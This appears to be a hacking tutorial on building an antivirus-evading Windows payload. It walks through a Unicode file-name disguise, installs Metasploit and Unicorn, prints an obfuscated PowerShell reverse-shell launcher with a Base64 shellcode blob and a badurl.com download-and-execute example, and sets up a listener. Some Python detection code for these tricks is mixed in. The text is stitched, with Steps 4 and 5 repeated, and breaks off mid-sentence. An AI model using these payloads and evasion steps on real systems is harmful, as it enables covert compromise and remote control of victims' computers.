How to Create an Undetectable Payload to Bypass Antivirus Software
Hackers are always looking for zero-day exploits that can bypass the security features of Windows 10. There is a great deal of research into creating undetectable malware, and entire GitHub projects are dedicated to automating the creation of undetectable payloads, such as WinPayloads, Veil v3, and TheFatRat.
With a little social engineering, tricking a target user into opening a malicious file can be as simple as injecting a bit of Unicode into the file name. For example, the GIF below shows a Windows executable (EXE) disguised to appear as a normal text file (TXT), even with "Hide extensions for known file types" disabled in File Explorer Options.
Make no mistake, the file on the right is an executable and, more importantly, is recognized by the Windows operating system as an executable. When the fake text file is clicked, it opens a new document in Notepad, the default text editor on Windows 10. After opening Notepad, it silently executes an embedded PowerShell payload (created with Unicorn) that creates a backdoor into the now-compromised Windows computer.
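A defender can catch this kind of disguise by inspecting the stored file name rather than the displayed one. The following Python check is an added example, not part of the original article; it assumes the injected Unicode is a bidirectional control or another invisible formatting character, and the extension list and sample names are constructed for illustration.

```python
import unicodedata

# Invisible characters that change the order in which text is displayed.
BIDI_CONTROLS = frozenset(
    "\u200e\u200f"                      # left-to-right / right-to-left marks
    "\u202a\u202b\u202c\u202d\u202e"    # embeddings, overrides, pop
    "\u2066\u2067\u2068\u2069"          # isolates
)
# Assumption: an illustrative list of extensions Windows runs on double-click.
EXECUTABLE_EXTS = frozenset(
    {"exe", "scr", "com", "pif", "bat", "cmd", "hta", "js", "vbs", "lnk"}
)


def stored_extension(name):
    """Extension in stored character order, which is what the OS acts on."""
    return name.rsplit(".", 1)[1].lower() if "." in name else ""


def inspect_filename(name):
    """Classify one file name as 'ok', 'review' or 'block'."""
    bidi = [f"U+{ord(ch):04X}" for ch in name if ch in BIDI_CONTROLS]
    other = [
        f"U+{ord(ch):04X}"
        for ch in name
        if unicodedata.category(ch) == "Cf" and ch not in BIDI_CONTROLS
    ]
    ext = stored_extension(name)
    executable = ext in EXECUTABLE_EXTS
    if (bidi or other) and executable:
        verdict = "block"    # hidden formatting plus a runnable extension
    elif bidi or other:
        verdict = "review"   # hidden formatting has no business in a file name
    else:
        verdict = "ok"       # an honest name, executable or not
    return {
        "extension": ext,
        "executable": executable,
        "bidi_controls": bidi,
        "other_format_chars": other,
        "verdict": verdict,
    }


def scan(names):
    """Return (log-safe escaped name, verdict) pairs for a listing."""
    return [
        (n.encode("unicode_escape").decode("ascii"), inspect_filename(n)["verdict"])
        for n in names
    ]


# Constructed sample listing (not taken from a real system).
SAMPLE_NAMES = [
    "notes.txt",
    "setup.exe",
    "invoice\u202etxt.exe",
    "r\u00e9sum\u00e9.txt",
    "readme\u200b.txt",
]

if __name__ == "__main__":
    for escaped, verdict in scan(SAMPLE_NAMES):
        print(f"{verdict:6} {escaped}")
```

Escaping the name before logging matters: printing the raw name to a terminal or ticket would reproduce the same misleading display the check is meant to expose.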
Unicorn, created by TrustedSec, is a simple tool designed to help penetration testers with PowerShell downgrade attacks and with injecting sophisticated shellcode payloads directly into memory. The techniques used by Unicorn are based on the work of Matthew Graeber and TrustedSec founder David Kennedy.
The steps are as follows:
Step 1
Install the Metasploit Framework
Metasploit is a dependency of Unicorn. Before installing Unicorn, I will quickly walk readers through a Metasploit installation to make sure it is fully up to date using the GitHub repository.
Kali does an excellent job of maintaining a stable version of Metasploit, but I will show how to install the latest version. First, remove any older versions of Metasploit that may be pre-installed in Kali.
apt-get remove metasploit-framework
Then, use cURL to download the Metasploit installer.
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
Raise the permissions of the newly created msfinstall file to make sure it will execute in Kali.
chmod 755 msfinstall
Then, run the installer script with ./msfinstall.
./msfinstall
Adding metasploit-framework to your repository list..OK
Updating package cache..OK
Checking for and installing update..
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  metasploit-framework
0 upgraded, 1 newly installed, 0 to remove and 124 not upgraded.
Need to get 161 MB of archives.
After this operation, 377 MB of additional disk space will be used.
Get:1 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid/main amd64 metasploit-framework amd64 4.16.57+20180529103642.git.4.6219ce0~1rapid7-1 [161 MB]
Get:1 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid/main amd64 metasploit-framework amd64 4.16.57+20180529103642.git.4.6219ce0~1rapid7-1 [161 MB]
Fetched 65.7 MB in 11min 39s (93.9 kB/s)
Selecting previously unselected package metasploit-framework.
(Reading database ... 145965 files and directories currently installed.)
Preparing to unpack .../metasploit-framework_4.16.57+20180529103642.git.4.6219ce0~1rapid7-1_amd64.deb ...
Unpacking metasploit-framework (4.16.57+20180529103642.git.4.6219ce0~1rapid7-1) ...
Setting up metasploit-framework (4.16.57+20180529103642.git.4.6219ce0~1rapid7-1) ...
update-alternatives: using /opt/metasploit-framework/bin/msfbinscan to provide /usr/bin/msfbinscan (msfbinscan) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfconsole to provide /usr/bin/msfconsole (msfconsole) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfd to provide /usr/bin/msfd (msfd) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfdb to provide /usr/bin/msfdb (msfdb) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfelfscan to provide /usr/bin/msfelfscan (msfelfscan) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfmachscan to provide /usr/bin/msfmachscan (msfmachscan) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfpescan to provide /usr/bin/msfpescan (msfpescan) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfrop to provide /usr/bin/msfrop (msfrop) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfrpc to provide /usr/bin/msfrpc (msfrpc) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfrpcd to provide /usr/bin/msfrpcd (msfrpcd) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfupdate to provide /usr/bin/msfupdate (msfupdate) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfvenom to provide /usr/bin/msfvenom (msfvenom) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/metasploit-aggregator to provide /usr/bin/metasploit-aggregator (metasploit-aggregator) in auto mode
Run msfconsole to get started
W: --force-yes is deprecated, use one of the options starting with --allow instead.
When the installer finishes, there will be a new metasploit-framework/ directory in the /opt directory.
Step 2
Install Unicorn
With Metasploit installed, the Unicorn GitHub repository can be cloned using git clone github.com/trustedsec/unicorn.
git clone https://github.com/trustedsec/unicorn
Cloning into 'unicorn'...
remote: Counting objects: 340, done.
remote: Total 340 (delta 0), reused 0 (delta 0), pack-reused 340
Receiving objects: 100% (340/340), 163.94 KiB | 45.00 KiB/s, done.
Resolving deltas: 100% (215/215), done.
Then, change into the new Unicorn directory using the cd command.
cd unicorn/
To see the available Unicorn options and a full description of each attack, use the ./unicorn.py --help argument.
./unicorn.py --help
-------------------- Magic Unicorn Attack Vector v3.1 -----------------------------
Native x86 powershell injection attacks on any Windows platform.
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Credits: Matthew Graeber, Justin Elze, Chris Gates
Happy Magic Unicorns.
Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>
PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
Macro Example CS: python unicorn.py <cobalt_strike_file.cs> cs macro
Macro Example Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode macro
HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
HTA Example CS: python unicorn.py <cobalt_strike_file.cs> cs hta
HTA Example Shellcode: python unicorn.py <path_to_shellcode.txt>: shellcode hta
DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde
CRT Example: python unicorn.py <path_to_payload/exe_encode> crt
Custom PS1 Example: python unicorn.py <path to ps1 file>
Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500
Cobalt Strike Example: python unicorn.py <cobalt_strike_file.cs> cs (export CS in C# format)
Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00)
Help Menu: python unicorn.py --help
Unicorn has several interesting and effective options. In this article I will focus on the PowerShell and Meterpreter solution.
Step 3
Generate the Payload
To create a payload with Unicorn, use the command below.
./unicorn.py windows/meterpreter/reverse_https <ATTACKER-IP-ADDRESS> <PORT>
Unicorn will use the Metasploit reverse_https module to connect to the attacker's IP address on the specified port.
[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode...
(ASCII-art unicorn banner)
aHR0cHM6Ly93d3cuYmluYXJ5ZGVmZW5zZS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTcvMDUvS2VlcE1hdHRIYXBweS5qcGc=
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Happy Magic Unicorns.
[********************************************************************************************************]
-----POWERSHELL ATTACK INSTRUCTIONS----
Everything is now generated in two files, powershell_attack.txt and unicorn.rc. The text file contains all of the code needed in order to inject the powershell attack into memory. Note you will need a place that supports remote command injection of some sort. Often times this could be through an excel/word doc or through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and scenarios to where you can use this attack at. Simply paste the powershell_attack.txt command in any command prompt window or where you have the ability to call the powershell executable and it will give a shell back to you. This attack also supports windows/download_exec for a payload method instead of just Meterpreter payloads.
When using the download and exec, simply put python unicorn.py windows/download_exec url=https://www.thisisnotarealsite.com/payload.exe and the powershell code will download the payload and execute.
Note that you will need to have a listener enabled in order to capture the attack.
[*******************************************************************************************************]
[*] Exported powershell output code to powershell_attack.txt.
[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create listener.
When Unicorn finishes generating the payload, two new files will be created. The first is powershell_attack.txt, which can be viewed using the cat powershell_attack.txt command. It reveals the PowerShell code that will be executed on the target Windows 10 machine to create the Meterpreter connection.
cat powershell_attack.txt
powershell /w 1 /C "s''v Mx -;s''v CV e''c;s''v nU ((g''v Mx).value.toString()+(g''v CV).value.toString());powershell (g''v nU).value.toString() ('[Base64-encoded payload omitted]')"
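The launcher above never contains a literal -ec or -EncodedCommand flag: it splits tokens with empty quotes (s''v, g''v, e''c) and assembles the flag from variables, so naive string matching on process command lines misses it. The following Python detection logic is an added example, not code from the original article or from the Unicorn project; the rule names, the marker list and the sample command lines are assumptions constructed here, and the encoded body in the sample is harmless marker text.

```python
import base64
import re

# Assumption: illustrative names a decoded script references when it allocates
# executable memory and starts a thread in it; extend for your environment.
INJECTION_MARKERS = ("dllimport", "virtualalloc", "createthread", "memset")
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def normalize(cmdline):
    """Undo cheap string tricks so the rules see what PowerShell evaluates."""
    text = cmdline.replace("''", "").replace('""', "")  # s''v -> sv
    text = re.sub(r"'\s*\+\s*'", "", text)               # 'AAA'+'BBB' -> 'AAABBB'
    return text.replace("`", "").replace("^", "")        # escape characters


def decode_utf16_b64(blob):
    """Return the text if blob is Base64 of UTF-16LE text, else None."""
    blob = blob[: len(blob) // 4 * 4]
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:
        return None
    high = raw[1::2]  # high bytes are zero for ASCII-range UTF-16LE text
    if not high or high.count(0) < 0.9 * len(high):
        return None
    return raw[: len(raw) // 2 * 2].decode("utf-16-le", errors="replace")


def analyze(cmdline):
    """Return the names of the rules a process command line triggers."""
    text = normalize(cmdline)
    low = text.lower()
    hits = []
    if "powershell" not in low:
        return hits
    if re.search(r"\w(''|\"\")\w", cmdline):
        hits.append("quote-split-token")
    if re.search(r"(?:^|\s)[-/]w[a-z]*\s+(1|hidden)\b", low):
        hits.append("hidden-window")
    if re.search(r"(?:^|\s)[-/](e|ec|en[a-z]*)\s+\S", low):
        hits.append("encoded-command-flag")
    if (re.search(r"\b(sv|set-variable)\s+\w+\s+-\s*;", low)
            and re.search(r"\b(gv|get-variable)\s+\w+\s*\)\.value", low)):
        hits.append("flag-built-from-variables")
    decoded = [d for d in (decode_utf16_b64(m.group())
                           for m in B64_RUN.finditer(text)) if d]
    if decoded:
        hits.append("utf16-base64-argument")
    if any(sum(mark in d.lower() for mark in INJECTION_MARKERS) >= 2
           for d in decoded):
        hits.append("decoded-injection-apis")
    return hits


def encode_command(ps_text):
    """Base64 of UTF-16LE, the encoding PowerShell expects for encoded commands."""
    return base64.b64encode(ps_text.encode("utf-16-le")).decode("ascii")


# Constructed samples. The encoded bodies are inert text, not payloads.
MARKER_BLOB = encode_command(
    "# constructed marker text only: [DllImport] VirtualAlloc CreateThread"
)
SAMPLE_OBFUSCATED = (
    "powershell /w 1 /C \"s''v Mx -;s''v CV e''c;"
    "s''v nU ((g''v Mx).value.toString()+(g''v CV).value.toString());"
    "powershell (g''v nU).value.toString() ('"
    + MARKER_BLOB[:100] + "'+'" + MARKER_BLOB[100:] + "')\""
)
ADMIN_TEXT = "Get-Date | Out-File C:\\Temp\\now.txt"
SAMPLE_ADMIN_ENCODED = (
    "powershell.exe -NoProfile -EncodedCommand " + encode_command(ADMIN_TEXT)
)
SAMPLE_BENIGN = (
    "powershell.exe -NoProfile -ExecutionPolicy RemoteSigned "
    "-File C:\\Scripts\\backup.ps1"
)

if __name__ == "__main__":
    for line in (SAMPLE_OBFUSCATED, SAMPLE_ADMIN_ENCODED, SAMPLE_BENIGN):
        print(analyze(line), "<-", line[:60])
```

The same rules can be run over command lines exported from process-creation logging; the decoded-content rule is what separates the launcher pattern from routine administrative use of encoded commands.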
The other file created by Unicorn is unicorn.rc, a resource file that automates the setup and configuration of msfconsole.
Step 4
Start Msfconsole Using the Resource File
To start Metasploit, run the msfconsole -r /opt/unicorn/unicorn.rc command.
msfconsole -r /opt/unicorn/unicorn.rc
=[ metasploit v4.16.59-dev- ]
+ -- --=[ 1769 exploits - 1008 auxiliary - 307 post ]
+ -- --=[ 537 payloads - 41 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
[*] Processing /opt/unicorn/unicorn.rc for ERB directives.
resource (/opt/unicorn/unicorn.rc)> use multi/handler
resource (/opt/unicorn/unicorn.rc)> set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
resource (/opt/unicorn/unicorn.rc)> set LHOST 192.168.1.5
LHOST => 192.168.1.5
resource (/opt/unicorn/unicorn.rc)> set LPORT 443
LPORT => 443
resource (/opt/unicorn/unicorn.rc)> set ExitOnSession false
ExitOnSession => false
resource (/opt/unicorn/unicorn.rc)> set EnableStageEncoding true
EnableStageEncoding => true
resource (/opt/unicorn/unicorn.rc)> exploit -j
[*] Exploit running as background job 0.
[-] Handler failed to bind to 192.168.1.5:443
msf exploit(multi/handler) > [*] Started HTTPS reverse handler on https://0.0.0.0:443
The resource file will automatically enable the handler (multi/handler), set the payload type (windows/meterpreter/reverse_https), set the attacker's IP address (LHOST), set the port number (LPORT), enable stager encoding (EnableStageEncoding), and start the msfconsole listener (exploit -j). Easy.
At this point, everything on the attacker's side is set up and ready for incoming connections. Now it is just a matter of verifying that the payload works and effectively bypasses Windows Defender and antivirus software.
Step 5
Test the Payload (Don't Upload It to VirusTotal)
In my tests, Unicorn's PowerShell payload was able to bypass Google Chrome, Windows Defender, and Avast antivirus detection on a fully patched Windows 10 Enterprise machine.
Many projects warn penetration testers of the dangers of using online virus scanners like VirusTotal. In the case of TheFatRat, the developer explicitly warns against using VirusTotal every time the program starts.
As someone who regularly experiments with a lot of antivirus evasion software, I fully understand the temptation to find out whether a created payload will evade detection
4ADYAOAAsADAAeABiAGIALAAwAHgAMAAxACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAZQA4ACwAMAB4AGIAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAyAGYALAAwAHgAMwA2ACwAMAB4ADMANAAsADAAeAA1ADIALAAwAHgANgAxACwAMAB4ADcAMgAsADAAeAAzADQALAAwAHgANQA3ACwAMAB4ADQAMgAsADAAeAA3ADkALAAwAHgANQAwACwAMAB4ADcANAAsADAAeAA3ADYALAAwAHgAMwAwACwAMAB4ADUANwAsADAAeAAzADcALAAwAHgANQAxACwAMAB4ADQAZQAsADAAeAA0AGUALAAwAHgAMwA0ACwAMAB4ADUANQAsADAAeAA0ADYALAAwAHgANQAxACwAMAB4ADMAMgAsADAAeAA1ADUALAAwAHgANQAxACwAMAB4ADcAMQAsADAAeAA3ADIALAAwAHgANwA5ACwAMAB4ADQAZQAsADAAeAAwADAALAAwAHgANQAwACwAMAB4ADYAOAAsADAAeAA1ADcALAAwAHgAOAA5ACwAMAB4ADkAZgAsADAAeABjADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADkALAAwAHgAYwA2ACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADMA'+'MgAsADAAeABlADAALAAwAHgAOAA0ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUANwAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeABlAGIALAAwAHgANQA1ACwAMAB4ADIAZQAsADAAeAAzAGIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADYALAAwAHgANgBhACwAMAB4ADAAYQAsADAAeAA1AGYALAAwAHgANgA4ACwAMAB4ADgAMAAsADAAeAAzADMALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA4ADkALAAwAHgAZQAwACwAMAB4ADYAYQAsADAAeAAwADQALAAwAHgANQAwACwAMAB4ADYAYQAsADAAeAAxAGYALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAA3ADUALAAwAHgANAA2ACwAMAB4ADkAZQAsADAAeAA4ADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAAyAGQALAAwAHgAMAA2ACwAMAB4ADEAOAAsADAAeAA3AGIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANQAsADAAeAAxADYALAAwAHgANgA4ACwAMAB4ADgAOAAsADAAeAAxADMALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgANAA0ACwAMAB4AGYAMAAsADAAeAAzADUALAAwAHgAZQAwACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANABmACwAMAB4ADcANQAsADAAeABjAGQALAAwAHgANgA4ACwAMAB4AGYAMAAsADAAeABiADUALAAwAHgAYQAyACwAMAB4ADUANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADYAYQAsADAAeAA0ADAALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAxADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA0ADAALAAwAHgAMAAwACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgANQA4ACwAMAB4AGEANAAsADAAeAA1ADMALAAwAHgAZQA1ACwA
MAB4AGYAZgAsADAAeABkADUALAAwAHgAOQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgAOAA5ACwAMAB4AGUANwAsADAAeAA1ADcALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAyADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAAxADIALAAwAHgAOQA2ACwAMAB4ADgAOQAsADAAeABlADIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANAAsADAAeABjAGQALAAwAHgAOABiACwAMAB4ADAANwAsADAAeAAwADEALAAwAHgAYwAzACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA1ACwAMAB4AGUANQAsADAAeAA1ADgALAAwAHgAYwAzACwAMAB4ADUAZgAsADAAeABlADgALAAwAHgANgA5ACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgAZgBmACwAMAB4ADMAMQAsADAAeAAzADkALAAwAHgAMwAyACwAMAB4ADIAZQAsADAAeAAzADEALAAwAHgAMwA2ACwAMAB4ADMAOAAsADAAeAAyAGUALAAwAHgAMwAxACwAMAB4ADIAZQAsADAAeAAzADUALAAwAHgAMAAwADsAJABxAFYAIAA9ACAAMAB4ADEAMAAwADcAOwBpAGYAIAAoACQAdABUAC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAA3ACkAewAkAHEAVgAgAD0AIAAkAHQAVAAuAEwAZQBuAGcAdABoAH0AOwAkAHEAZQA9ACQAWABkADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAANwAsACQAcQBWACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAWABEAD0AMAA7ACQAWABEACAALQBsAGUAIAAoACQAdABUAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAFgARAArACsAKQAgAHsAJABYAGQAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABxAGUALgBUAG8ASQBuAHQAMwAyACgAKQArACQAWABEACkALAAgACQAdABUAFsAJABYAEQAXQAsACAAMQApAH0AOwAkAFgAZAA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAcQBlACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwApAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABFAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAdABUAFYAKQApADsAJABCAHYAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAcABMACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAHAATAAgACQAQgB2ACAAJABFAGQAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAA
IgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAQgB2ACAAJABFAGQAIgA7AH0A')"
The other file Unicorn creates is unicorn.rc, a resource file that automates the msfconsole setup and configuration.
Step 4
Start Msfconsole Using the Resource File
To start Metasploit, run the command msfconsole -r /opt/unicorn/unicorn.rc.
msfconsole -r /opt/unicorn/unicorn.rc
       =[ metasploit v4.16.59-dev- ]
+ -- --=[ 1769 exploits - 1008 auxiliary - 307 post ]
+ -- --=[ 537 payloads - 41 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
[*] Processing /opt/unicorn/unicorn.rc for ERB directives.
resource (/opt/unicorn/unicorn.rc)> use multi/handler
resource (/opt/unicorn/unicorn.rc)> set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
resource (/opt/unicorn/unicorn.rc)> set LHOST 192.168.1.5
LHOST => 192.168.1.5
resource (/opt/unicorn/unicorn.rc)> set LPORT 443
LPORT => 443
resource (/opt/unicorn/unicorn.rc)> set ExitOnSession false
ExitOnSession => false
resource (/opt/unicorn/unicorn.rc)> set EnableStageEncoding true
EnableStageEncoding => true
resource (/opt/unicorn/unicorn.rc)> exploit -j
[*] Exploit running as background job 0.
[-] Handler failed to bind to 192.168.1.5:443
msf exploit(multi/handler) > [*] Started HTTPS reverse handler on https://0.0.0.0:443
The resource file automatically enables the handler (multi/handler), sets the payload type (windows/meterpreter/reverse_https), sets the attacker's IP address (LHOST), sets the port number (LPORT), enables stager encoding (EnableStageEncoding), and starts the msfconsole listener (exploit -j). Easy.
At this point, everything on the attacker's side is set up and ready for incoming connections. Now it is just a matter of verifying that the payload works and effectively bypasses Windows Defender and antivirus software.
Step 5
Test the Payload (Don't Upload It to VirusTotal)
In my tests, Unicorn's PowerShell payload was able to bypass Google Chrome, Windows Defender, and Avast antivirus detection on a fully patched Windows 10 Enterprise machine.
Many projects warn penetration testers about the dangers of using online virus scanners such as VirusTotal. In the case of TheFatRat, the developer explicitly warns against using VirusTotal every time the program starts.
As someone who regularly experiments with a lot of antivirus evasion software, I fully understand the temptation to find out whether a created payload will evade detection
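From the defender's side, a launcher like the one in powershell_attack.txt still leaves a recognizable process command line: a hidden-window switch (/w 1), tokens split by empty quote pairs (s''v, g''v), and a long Base64 argument broken up with '+'. The following is an added example, not code from the original page or from Unicorn, that checks process-creation command lines (as recorded by Sysmon Event ID 1 or Security event 4688) for those three traits. The function names, the length thresholds and the sample lines are assumptions constructed for illustration.

```python
import base64
import re

def _b64_utf16(text):
    """Encode text as UTF-16LE Base64, the form PowerShell encoded arguments use."""
    return base64.b64encode(text.encode("utf-16-le")).decode()

# Constructed process-creation command lines (the kind recorded by Sysmon
# Event ID 1 or Security 4688). The encoded text is benign filler.
_BLOB = _b64_utf16("Write-Output 'constructed benign filler for the detector'")
SAMPLES = [
    "powershell /w 1 /C \"s''v Mx -;s''v CV e''c;powershell (g''v Mx).value ('"
    + _BLOB[:40] + "'+'" + _BLOB[40:] + "')\"",
    "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1 -Target D:\\",
    "powershell -WindowStyle Hidden -Command Get-Date",
]

SWITCH = re.compile(r"(?<!\S)[-/]([A-Za-z]+)\s+(\S+)")
QUOTE_SPLIT = re.compile(r"[A-Za-z]''[A-Za-z]")   # e.g. s''v, g''v
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")  # threshold is an assumption

def hidden_window(cmd):
    """True if a -WindowStyle switch (any abbreviation) asks for a hidden window."""
    for name, value in SWITCH.findall(cmd):
        value = value.strip("\"'").lower()
        if "windowstyle".startswith(name.lower()) and value in ("1", "hidden"):
            return True
    return False

def utf16_base64(cmd):
    """True if a long Base64 run, rejoined across '+' splits, decodes to UTF-16LE text."""
    joined = re.sub(r"['\"]\s*\+\s*['\"]", "", cmd)
    for run in B64_RUN.findall(joined):
        run = run.rstrip("=")
        raw = base64.b64decode(run[: len(run) // 4 * 4])
        if len(raw) >= 30 and raw[1::2].count(0) / len(raw[1::2]) > 0.9:
            return True
    return False

def findings(cmd):
    """Return the names of the indicators present in one command line."""
    checks = {"hidden_window": hidden_window(cmd),
              "quote_split_token": bool(QUOTE_SPLIT.search(cmd)),
              "utf16_base64_argument": utf16_base64(cmd)}
    return [name for name, hit in checks.items() if hit]

if __name__ == "__main__":
    for line in SAMPLES:
        print(findings(line), "<-", line[:60])
```

A hidden window on its own also appears in legitimate scheduled tasks, so the combination of indicators is the stronger signal than any single one.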